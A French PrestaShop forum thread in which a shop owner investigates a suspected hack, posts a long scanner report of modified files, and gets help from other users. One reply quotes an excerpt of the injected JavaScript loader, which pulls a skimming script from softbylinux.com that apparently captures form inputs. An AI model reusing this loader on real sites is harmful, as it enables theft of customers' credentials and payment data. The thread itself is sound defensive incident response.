Piratage en cours sur mon site sous prestashop 1.6 ? Besoin d'aide svp

[mandrake]

Bonjour, j'ai reçu une confirmation de commande et de paiement et sur chaque en-tête il y a un script qui apparait qui n'a rien à faire là (j'ai masqué le nom de mon site et j'ai mis le code en capture d'écran car sinon je suis bloqué sur le forum) Il est en version 1.6 : Quelqu'un aurait la gentillesse de me dire ce que c'est, d'autant ce domaine softbylinux, n'est pas vieux, il a été déposé en septembre. j'aimerai vérifier si il y a un piratage sur le site mais je ne sais pas comment faire; merci pour votre aide et bonne année 2025 !

[Eolia]

Hum, ça ne ressemble pas à un hack mais à une protection de votre serveur mail.

Vous n'avez rien mis en place ? C'est le genre d'appli qui empêche que l'on puisse répondre directement à un mail si on ne fait pas partie de la liste des expéditeurs connus.

A voir avec votre hébergeur.

Edit: c'est louche, on retrouve ce script sur plein de Prestashop.

Vous avez lancé Cleaner ?

Edited January 4 by Eolia (see edit history)

[Eolia]

Après analyse ça pue vraiment. En gros ça choppe tout ce qui entré en select ou input et ça envoie ça à leur serveur.

Vol d'identité et de mots de passe possibles donc.

[Eolia]

https://www.securefeed.com/Content/WebLookup?host=softbylinux.com

[mandrake]

Bonjour, on a une idée de solution possible ?

[Eolia]

Que vous dit Cleaner ?

[mandrake]

Cleaner ? Désolé je ne sais pas ce que c'est... A part CCleaner...Comment cela fonctionne-t-il ?

[mandrake]

Ou alors on parle de l'outil de nettoyage de prestashop ? Je vérifie les contraintes d'intégrité fonctionnelle, c'est bien ça ?

 

[Eolia]

https://shop.devcustom.net/fr/content/16-nettoyage-hack

[mandrake]

Merci, je le connaissais mais j'avais complétement oublié ce précieux outil !
Il y a une quantité de lignes oranges et voic les lignes en rouge :
Contrôle des scripts JS: MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js
Recherche de fichiers htaccess ajoutés ou modifiés:Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess
Recherche de fichiers php ajoutés:

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php
Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php

Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel):Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php
Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php
Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php
 

[mandrake]

Qu'en pensez-vous ?

[Eolia]

Il faudrait le screen complet car il y a forcément un endroit ou ce script est inséré.

[mandrake]

Listing initial des 17335 fichiers effectué en 2.789 sec.

Par sécurité l'url du script a été modifiée. Notez la nouvelle url si vous fermez cette page.
Si vous avez oublié l'url, relancez cleaner.php après l'avoir re-téléchargé

Si des messages de nettoyage ou suppression sont affichés en rouge, votre e-boutique est susceptible d'avoir été attaquée et a été protégée d'urgence
mais il est nécessaire de RESTAURER les fichiers modifiés, de CHANGER le nom de votre répertoire admin et de CHANGER les mots de passe des employés de votre boutique.

 

Contrôle des fichiers admin:

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1425479164-264f6299.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1493897036-c73f981.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1524671343-10ee9b94.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1428452834-1908a9d1.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1453151779-4e8dd25.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1455455859-209e9900.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1430125085-4c060c4c.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/backups/1460499163-41430134.sql.bz2

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/dashboard/helpers/view/view.tpl

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/controllers/login/content.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/content.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/controllers/login/header.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/footer.tpl

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/page_header_toolbar.tpl.bak

Fichier inexistant dans la version d'origine. Contenu à contrôler => www/**admin**/themes/default/template/header.tpl.bak

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/header.tpl

MD5 ADMIN WARNING : Fichier différent de l'original => www/**admin**/themes/default/template/page_header_toolbar.tpl

 

Contrôle sur les fichiers sensibles connus pour être modifiés:

Aucun fichier sensible modifié
 

Contrôle de sécurité sur les fichiers php coeur:

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/config/defines.inc.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/front/PasswordController.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php

Fichier sans extension détecté => www/modules/sd_adminprivacy/override/classes/Tools.php.1.0.0.0

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Validate.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Tools.php

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/classes/Customer.php

 

Contrôle des scripts JS:

MD5 ADMIN WARNING : Fichier différent de l'original => www/js/tinymce.inc.js

 

Contrôle des images pouvant contenir un script:

Aucun fichier image suspect detecté
 

Recherche des infections connues:

Aucun code suspect connu trouvé
 

Contrôle de sécurité sur fichiers indésirables connus:

Aucun fichier indésirable connu trouvé

Contrôle des droits:

Droits incorrects (777) pour le répertoire: /img/cms/zones-montagneuses Doit être 755 ou 705
Droits incorrects (777) pour le répertoire: /img/webrotate_360 Doit être 755 ou 705

Recherche de fichiers .xxx ajoutés connus comme étant des infections:

Aucun fichier .xxx suspect trouvé

Recherche de fichiers htaccess ajoutés ou modifiés:

Fichier .htaccess inconnu à contrôler: => www/modules/pninlineeditor/kcfinder/upload/.htaccess

Veuillez contrôler l'ajout de fichier php dans ces répertoires (Normalement détectés dans la recherche des modules)
 

Recherche de fichiers php ajoutés:

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.inc.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/config/settings.old.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/controllers/front/ContactController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CategoryController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ProductController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/CmsController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/ManufacturerController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/controllers/front/SupplierController.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/Controller.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/controller/FrontController.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Mail.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection ($_GET[) => www/override/classes/Link.php

Fichier php inexistant dans la version d'origine qui contient des fonctions permettant une injection (file_get_contents() => www/override/classes/Tools.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/override/classes/shop/Shop.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/tools/htmlpurifier/standalone/HTMLPurifier/Language/messages/en.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/errors.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/pdf.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/fields.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/tabs.php

Fichier php inexistant dans la version d'origine. Contenu à contrôler => www/translations/fr/admin.php

Recherche de vulnérabilité sur les modules (A titre d'information. Si vous ne savez pas interpréter le code, veuillez demander l'avis d'un professionnel):

Fonction sensible à contrôler: file_get_contents( => www/modules/vatnumber/vatnumber.php

Fonction sensible à contrôler: include( => www/modules/vatnumber/ajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/exapredictedition.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredictedition/AdminExaPredictEdition.php

Fonction sensible à contrôler: file_get_contents( => www/modules/securitypatch/classes/HotfixPatches.php

Fonction sensible à contrôler: include( => www/modules/securitypatch/securitypatch.php

Fonction sensible à contrôler: include( => www/modules/favoriteproducts/favoriteproducts-ajax.php

Fonction sensible à contrôler: include_once => www/modules/favoriteproducts/favoriteproducts.php

Fonction sensible à contrôler: include( => www/modules/exapredict/validationopc.php

Fonction sensible à contrôler: $_POST[ => www/modules/exapredict/exapredict.php

Fonction sensible à contrôler: include( => www/modules/exapredict/validation.php

Fonction sensible à contrôler: base64_decode => www/modules/payplug/ipn.php

Fonction sensible à contrôler: fwrite => www/modules/payplug/backward_compatibility/Context.php

Fonction sensible à contrôler: file_put_contents => www/modules/faq/faq.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom_second/ph_blog_column_custom_second.php

Fonction sensible à contrôler: include_once => www/modules/top1e_ajaxlivesearch/controller_ajax_search.php

Fonction sensible à contrôler: include_once => www/modules/pninlineeditor/kcfinder/integration/BolmerCMS.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/core/class/minifier.php

Fonction sensible à contrôler: $_POST[ => www/modules/pninlineeditor/kcfinder/core/class/browser.php

Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/core/class/uploader.php

Fonction sensible à contrôler: GLOBALS => www/modules/pninlineeditor/kcfinder/core/bootstrap.php

Fonction sensible à contrôler: $_GET[ => www/modules/pninlineeditor/kcfinder/js_localize.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pninlineeditor/kcfinder/lib/helper_httpCache.php

Fonction sensible à contrôler: eval( => www/modules/pninlineeditor/kcfinder/lib/class_image.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/duplicateurlredirect.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.4/classes/FrontController.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.6/classes/controller/FrontController.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/header.php

Fonction sensible à contrôler: include_once => www/modules/duplicateurlredirect/override_1.5/classes/controller/FrontController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom/ph_blog_custom.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/classes/Link.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ManufacturerController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/ProductController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CategoryController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/SupplierController.php

Fonction sensible à contrôler: $_GET[ => www/modules/friendlyurl/override/controllers/front/CmsController.php

Fonction sensible à contrôler: $_POST[ => www/modules/opartproductvideo/models/Video.php

Fonction sensible à contrôler: $_GET[ => www/modules/opartproductvideo/controllers/admin/AdminOpartproductvideoController.php

Fonction sensible à contrôler: include( => www/modules/opartproductvideo/opartproductvideo.php

Fonction sensible à contrôler: file_put_contents => www/modules/seomanager/SimpleLogger.php

Fonction sensible à contrôler: fwrite => www/modules/seomanager/DeBug.php

Fonction sensible à contrôler: include_once => www/modules/seomanager/seomanager.php

Fonction sensible à contrôler: $_FILES[ => www/modules/psthemextender/psthemextender.php

Fonction sensible à contrôler: include( => www/modules/gsitemap/gsitemap-cron.php

Fonction sensible à contrôler: fwrite => www/modules/gsitemap/backward_compatibility/Context.php

Fonction sensible à contrôler: file_get_contents( => www/modules/gsitemap/gsitemap.php

Fonction sensible à contrôler: $_FILES[ => www/modules/tetbanner/tetbanner.php

Fonction sensible à contrôler: $_POST[ => www/modules/mdtossend/removePDF.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/install/Mail_save.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_static.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_images.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/include/tcpdf_fonts.php

Fonction sensible à contrôler: include( => www/modules/mdtossend/tcpdf/tcpdf.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/tcpdf/tcpdf_import.php

Fonction sensible à contrôler: file_get_contents( => www/modules/mdtossend/mdtossend.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockcategories/controllers/admin/AdminBlockCategoriesController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_column_custom/ph_blog_column_custom.php

Fonction sensible à contrôler: include_once => www/modules/blockrss/blockrss.php

Fonction sensible à contrôler: file_get_contents( => www/modules/pscleaner/pscleaner.php

Fonction sensible à contrôler: include( => www/modules/eicaptcha/eicaptcha-ajax.php

Fonction sensible à contrôler: include_once => www/modules/homeslider/homeslider.php

Fonction sensible à contrôler: include_once => www/modules/homeslider/ajax_homeslider.php

Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/gamification.php

Fonction sensible à contrôler: include_once => www/modules/gamificationOLD/controllers/admin/AdminGamificationController.php

Fonction sensible à contrôler: $_POST[ => www/modules/specialsslide/specialsslide.php

Fonction sensible à contrôler: $_POST[ => www/modules/editorial/EditorialClass.php

Fonction sensible à contrôler: include_once => www/modules/editorial/editorial.php

Fonction sensible à contrôler: include( => www/modules/mailalerts/mailalerts-account.php

Fonction sensible à contrôler: include_once => www/modules/mailalerts/mailalerts.php

Fonction sensible à contrôler: $_POST[ => www/modules/blocklink/blocklink.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockadvertising/blockadvertising.php

Fonction sensible à contrôler: $_GET[ => www/modules/cmstab/cmstab.php

Fonction sensible à contrôler: $_GET[ => www/modules/htmlbox/htmlbox.php

Fonction sensible à contrôler: fwrite => www/modules/newsletter/newsletter.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/facebookloginajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/classes/voucher.php

Fonction sensible à contrôler: file_get_contents( => www/modules/prestasocial/classes/facebook.php

Fonction sensible à contrôler: include_once => www/modules/prestasocial/voucher.php

Fonction sensible à contrôler: $_POST[ => www/modules/prestasocial/prestasocial.php

Fonction sensible à contrôler: include_once => www/modules/sendtoafriend/sendtoafriend_ajax.php

Fonction sensible à contrôler: include( => www/modules/webrotate_360view/webrotate_360view.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/controller/AdminController.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/img/AdminController.php

Fonction sensible à contrôler: $_GET[ => www/modules/webrotate_360view/classes/WebrotateQqUploadedFileXhr.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_blog_custom_second/ph_blog_custom_second.php

Fonction sensible à contrôler: fwrite => www/modules/ganalytics/backward_compatibility/Context.php

Fonction sensible à contrôler: include_once => www/modules/ganalytics/ganalytics.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/downloadbackupfile.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/ExportImportDatabase.php

Fonction sensible à contrôler: file_get_contents( => www/modules/prestashopbackup/class.phpmailer.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/sdk.class.php

Fonction sensible à contrôler: eval( => www/modules/prestashopbackup/JSON.php

Fonction sensible à contrôler: base64_decode => www/modules/prestashopbackup/services/ec2.class.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/filecron_restore.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron_restore.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/cron/dbcron.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/FileBackup.php

Fonction sensible à contrôler: gzinflate => www/modules/prestashopbackup/utilities/gzipdecode.class.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/lib/requestcorepc/requestcorepc.class.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/lib/yaml/lib/sfYaml.php

Fonction sensible à contrôler: file_put_contents => www/modules/prestashopbackup/lib/cachecore/cachefile.class.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/lib/cachecore/cachecore.class.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/prestashopbackup.php

Fonction sensible à contrôler: include( => www/modules/prestashopbackup/PrestoChangeoClasses/FrontController.php

Fonction sensible à contrôler: fwrite => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoContext.php

Fonction sensible à contrôler: include_once => www/modules/prestashopbackup/PrestoChangeoClasses/PrestoChangeoModule.php

Fonction sensible à contrôler: $_POST[ => www/modules/etransactions/etransactions.php

Fonction sensible à contrôler: $_FILES[ => www/modules/etransactions/classes/ETransactionsAdminConfig.php

Fonction sensible à contrôler: base64_decode => www/modules/etransactions/classes/ETransactionsEncrypt.php

Fonction sensible à contrôler: file_get_contents( => www/modules/etransactions/classes/ETransactionsHelper.php

Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/classes/ETransactionsController.php

Fonction sensible à contrôler: $_GET[ => www/modules/etransactions/index.php

Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/gapi

Fonction sensible à contrôler: file_get_contents( => www/modules/gapi/gapi.php

Fonction sensible à contrôler: include( => www/modules/gapi/oauth2callback.php

Fonction sensible à contrôler: include_once => www/modules/blockreinsurance/blockreinsurance.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockreinsurance/reinsuranceClass.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/AdminIciRelaisEdition.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelaisedition/icirelaisedition.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockstore/blockstore.php

Fonction sensible à contrôler: fwrite => www/modules/exportdata/backward_compatibility/Context.php

Fonction sensible à contrôler: include_once => www/modules/exportdata/exportdata-csv.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/blockwishlist.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/mywishlist.php

Fonction sensible à contrôler: include_once => www/modules/blockwishlist/controllers/front/view.php

Fonction sensible à contrôler: $_GET[ => www/modules/blockwishlist/managewishlist.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockwishlist/sendwishlist.php

Fonction sensible à contrôler: include_once => www/modules/jbx_superuser/AdminSuperUser.php

Fonction sensible à contrôler: include( => www/modules/paybox/validation.php

Fonction sensible à contrôler: include( => www/modules/paybox/unsubscribe.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3d.php

Fonction sensible à contrôler: include( => www/modules/paybox/redirect.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidationoneclick.php

Fonction sensible à contrôler: include( => www/modules/paybox/directcapturepayment.php

Fonction sensible à contrôler: include_once => www/modules/paybox/paybox.php

Fonction sensible à contrôler: include( => www/modules/paybox/short.php

Fonction sensible à contrôler: $_FILES[ => www/modules/paybox/classes/PayboxConfiguration.php

Fonction sensible à contrôler: include( => www/modules/paybox/directvalidation3doneclick.php

Fonction sensible à contrôler: $_POST[ => www/modules/blocknewsletter/blocknewsletter.php

Fonction sensible à contrôler: $_GET[ => www/modules/banippro/banippro.php

Répertoire indésirable détecté (à supprimer ou à sauvegarder ailleurs): /modules/blockloichatelbak

Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel.bak/class/popupmodel.php

Fonction sensible à contrôler: include_once => www/modules/megablock/megablock.php

Fonction sensible à contrôler: $_POST[ => www/modules/megablock/megablockClass.php

Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/controladorList.php

Fonction sensible à contrôler: include_once => www/modules/pnadvancedproductslist/gestordbproductlist.php

Fonction sensible à contrôler: $_FILES[ => www/modules/blockbanner/blockbanner.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/ph_simpleblog.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/models/SimpleBlogTag.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/PhpThumb.inc.php

Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/phpthumb/ThumbBase.inc.php

Fonction sensible à contrôler: include_once => www/modules/ph_simpleblog/assets/phpthumb/ThumbLib.inc.php

Fonction sensible à contrôler: file_get_contents( => www/modules/ph_simpleblog/assets/recaptchalib.php

Fonction sensible à contrôler: include( => www/modules/ph_simpleblog/ajax.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogTagsController.php

Fonction sensible à contrôler: file_put_contents => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogSettingsController.php

Fonction sensible à contrôler: $_POST[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogPostsController.php

Fonction sensible à contrôler: $_FILES[ => www/modules/ph_simpleblog/controllers/admin/AdminSimpleBlogCategoriesController.php

Fonction sensible à contrôler: include( => www/modules/icirelais/validation.php

Fonction sensible à contrôler: $_POST[ => www/modules/icirelais/icirelais.php

Fonction sensible à contrôler: include( => www/modules/icirelais/validationopc.php

Fonction sensible à contrôler: include( => www/modules/cheque/validation.php

Fonction sensible à contrôler: $_FILES[ => www/modules/themeconfigurator/themeconfigurator.php

Fonction sensible à contrôler: include_once => www/modules/referralprogram/controllers/front/program.php

Fonction sensible à contrôler: file_get_contents( => www/modules/referralprogram/controllers/front/email.php

Fonction sensible à contrôler: fwrite => www/modules/referralprogram/referralprogram.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockcmsinfo/infoClass.php

Fonction sensible à contrôler: $_FILES[ => www/modules/loihamon/controllers/front/retractation.php

Fonction sensible à contrôler: include_once => www/modules/blockloichatel/blockloichatel.php

Fonction sensible à contrôler: $_POST[ => www/modules/blockloichatel/class/popupmodel.php

Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/override/classes/Tools.php

Fonction sensible à contrôler: file_put_contents => www/modules/sd_adminprivacy/sd_adminprivacy.php

Fonction sensible à contrôler: eval( => www/modules/sd_adminprivacy/classes/Services/JSON.php

Fonction sensible à contrôler: include( => www/modules/sd_adminprivacy/classes/Samdha/Module/Module.php

Fonction sensible à contrôler: file_get_contents( => www/modules/sd_adminprivacy/classes/Samdha/Module/Tools.php

Fonction sensible à contrôler: fwrite => www/modules/sd_adminprivacy/backward_compatibility/Context.php

Fonction sensible à contrôler: include( => www/modules/bankwire/validation.php

Fonction sensible à contrôler: $_GET[ => www/modules/twitterwidget/twitterwidget.php

Fonction sensible à contrôler: file_put_contents => www/modules/categoriestopmenuxxl/categoriestopmenuxxl.php

Fonction sensible à contrôler: file_get_contents( => www/modules/categoriestopmenuxxl/lessc.inc.php

Fonction sensible à contrôler: $_FILES[ => www/modules/productpaymentlogos/productpaymentlogos.php

Fonction sensible à contrôler: file_get_contents( => www/modules/productvideos/productvideos.php

Fonction sensible à contrôler: include( => www/modules/statsvisitorpages/loadDetails.php

Fonction sensible à contrôler: include( => www/modules/blockcart/blockcart-set-collapse.php

Fonction sensible à contrôler: include_once => www/modules/extratabspro/ajax_extratabspro.php

Fonction sensible à contrôler: $_GET[ => www/modules/extratabspro/extratabspro.php

Fonction sensible à contrôler: include_once => www/modules/giftcard/giftcard.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-attribute-indexer.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-ajax.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-url-indexer.php

Fonction sensible à contrôler: file_get_contents( => www/modules/blocklayered/blocklayered.php

Fonction sensible à contrôler: include( => www/modules/blocklayered/blocklayered-price-indexer.php

Fonction sensible à contrôler: include_once => www/modules/blockcms/blockcms.php

Fonction sensible à contrôler: include_once => www/modules/productcomments/productcomments-ajax.php

Fonction sensible à contrôler: $_GET[ => www/modules/productcomments/productcommentscriterion.php

Fonction sensible à contrôler: include_once => www/modules/productcomments/controllers/front/default.php

Fonction sensible à contrôler: file_get_contents( => www/modules/productcomments/productcomments.php

Peak usage: 19023 KB of memory.
 

ANALYSE TERMINÉE (Effectuée en 9.816 sec.)

!!! ATTENTION !!! Certains de vos fichiers coeurs ont été modifiés.
Si ces modifications ne sont pas volontaires, nous vous conseillons de comparer les fichiers avec les 2 zips (suspicious_xxxx et Prestashop) et de les restaurer dans leur version d'origine si nécessaire.

IMPORTANT: Si les fichiers coeurs modifiés commencent par /**/ vous avez été victime d'un hack. Restaurez les versions d'origine immédiatement !


INFO: Votre site possède la version patchée du répertoire www/**admin**/filemanager

 

[mandrake]

L'analyse est complète avec les gros fichiers incluse

[Eolia]

Ce qui sent pas bon (à restaurer)

MD5 INTEGRITY : Fichier php modifié par rapport à la version d'origine. Contenu à contrôler => www/www/controllers/admin/AdminLoginController.php

Pour le reste je ne vois rien de flagrant

Trouvez-vous ce code (softbylinux.com) dans la code source de votre page ?

[mandrake]

Dans les faits, je vois le code dans les mails que l'on reçoit après paiement de la commande. Sans quoi j'ai téléchargé tous les fichiers du site et j'ai effectué une recherche en tapant le nom de domaine mais je n'ai rien trouvé. La seule partie que je n'ai pas vérifié c'est la bdd

[mandrake]

Le code est intégré dans le logo des mails reçus

[mandrake]

rien non plus dans la bdd

[mandrake]

Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ?

[Eolia]

En fait il est injecté dans le header après chargement, peut-être dans la fonction smartyOutputContent() et la ligne est ensuite supprimée sauf si l'option "déplacer les js à la fin" est active ou qu'on est dans les mails (le header ne fait pas partie du DOM à ce moment là)

        let a = document.head.querySelector('[src*="https://softbylinux.com/tps.js?host=www.site.com"]');
        if(!a){ 
            let s=document.createElement('script');
            s.setAttribute('defer','');
            s.setAttribute('src','https://softbylinux.com/tps.js?host=www.site.com');
            document.head.appendChild(s);
            return
        } else {
            let scrs = document.body.querySelectorAll('[src*="https://softbylinux.com/tps.js?host=www.site.com"]');
            for (let element of scrs){
                element.remove();
            }
            let hookdiv = document.getElementById('hookwork');
            if (!hookdiv) {
                hookdiv = document.createElement('div');
                hookdiv.setAttribute('id', 'hookwork');
                hookdiv.setAttribute('hidden','hidden');
                document.body.appendChild(hookdiv);

 

[Eolia]

à l’instant, mandrake a dit :

Je pensais mettre une règle dans le htaccess qui interdirait l'accès à tps.js sur mon site. Qu'en pensez-vous ?

Vous pouvez le faire mais il serait préférable de trouver l'entrée.

[mandrake]

Ça dépasse de très loin mes compétences actuelles, j'ai de gros problèmes de santé et un traitement qui altèrent ma mémoire depuis quelques années. C'est compliqué pour moi d'avoir une réflexion logique poussée. Cela me demande un énorme effort de concentration.

[mandrake]

Comment trouver cette entrée pour ensuite la patcher ? Cela me paraît vraiment compliqué.

[mandrake]

J'ai désactivé l'option "Déplacer les fichiers JS à la fin", histoire que cela empêche le script malveillant de rester actif dans certaines conditions. J'ai bien fait ?

[Eolia]

Non, laissez cette option activé, au contraire.

Pouvez-vous m'envoyer l'url du site concerné en MP ?

[mandrake]

Oui, pas de soucis. C'est un vieux coucou.

[mandrake]

Avez-vous bien reçu mon message ? Merci

[kis2a]

Avais vous modifer / ajouter  / installer de nouvelle chose (module.. etc )

 

ou ces arriver comme ca d'un coup ? ( changer deja tous vos acces , ftp , bdd ,email ......... )

 

il serais peut être  judicieux , de vous mettre en maintenance ! pendant la résolution du  problème , et même  upgrade votre site pour etre a jour car ps 1.6 ..........

Edited January 4 by kis2a (see edit history)

[kis2a]

3 hours ago, Eolia said:

https://shop.devcustom.net/fr/content/16-nettoyage-hack

celui ci marche sur toute version prestashop ? ou limiter a x version ?

[Mediacom87]

Il y a 17 heures, kis2a a dit :

celui ci marche sur toute version prestashop ? ou limiter a x version ?

C'est indiqué :

Citation

- Script compatible toutes versions Presta (les versions supérieures à 1.6 ne sont plus contrôlées en intégrité)

 

